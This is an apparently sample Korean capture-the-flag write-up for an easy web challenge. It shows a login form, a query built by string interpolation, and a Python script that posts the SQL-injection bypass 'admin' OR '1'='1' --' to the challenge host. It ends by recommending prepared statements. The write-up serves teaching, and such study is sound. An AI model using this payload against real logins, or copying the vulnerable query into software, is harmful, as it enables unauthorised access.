Sample CTF 2026🌐 WEBeasy
Sample CTF - Web Challenge
샘플 CTF Writeup입니다.
100 points50 solves
#web#sqli#sample
Sample CTF - Web Challenge
문제 개요
| 항목 | 내용 |
|---|---|
| CTF | Sample CTF 2026 |
| Category | Web |
| Points | 100 |
| Solves | 50 |
분석
문제 페이지에 접속하면 로그인 폼이 있습니다.
html
<form action="/login" method="POST">
<input name="username" type="text">
<input name="password" type="password">
<button type="submit">Login</button>
</form>취약점
SQL Injection 취약점이 존재합니다:
sql
SELECT * FROM users WHERE username = '$input' AND password = '$password'Exploit
python
import requests
url = "http://challenge.ctf/login"
payload = {
"username": "admin' OR '1'='1' --",
"password": "anything"
}
response = requests.post(url, data=payload)
print(response.text) # FLAG{sample_flag_here}Flag
plaintext
FLAG{sample_flag_here}교훈
- 항상 Prepared Statement 사용
- 입력값 검증 필수
댓글
댓글을 불러오는 중...